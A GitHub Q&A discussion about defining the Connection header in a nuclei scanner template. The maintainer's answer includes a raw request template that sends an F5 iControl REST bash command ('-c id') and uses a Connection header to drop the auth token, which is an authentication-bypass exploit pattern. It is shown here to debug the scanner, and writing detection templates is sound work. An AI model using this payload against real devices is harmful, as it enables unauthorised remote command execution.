Skip to content

Connection 字段无法定义 #1982

Closed Answered by ehsandeep
Henry4E36 asked this question in Q&A
Discussion options

You must be logged in to vote

@Henry4E36 below template works as expected; what's the issue?

id: test

info:
  name: test test
  author: test
  severity: info

requests:
  - raw:
    - |
      POST /mgmt/tm/util/bash HTTP/1.1
      Host: {{Hostname}}
      X-F5-Auth-Token: a
      Connection: keep-alive, x-F5-Auth-Token
      Authorization: Basic YWRtaW46
      Content-Type: application/json
    

      {"command": "run", "utilCmdArgs": "-c id"}
echo http://0.0.0.0:8000 | nuclei -t test.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.0

		projectdiscovery.io

[WRN] Use with caution. You are responsibl…

Replies: 3 comments

Comment options

You must be logged in to vote
0 replies
Answer selected by ehsandeep
Comment options

You must be logged in to vote
0 replies
Comment options

You must be logged in to vote
0 replies
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Category
Q&A
Labels
None yet
2 participants
Converted from issue

This discussion was converted from issue #1972 on May 11, 2022 12:11.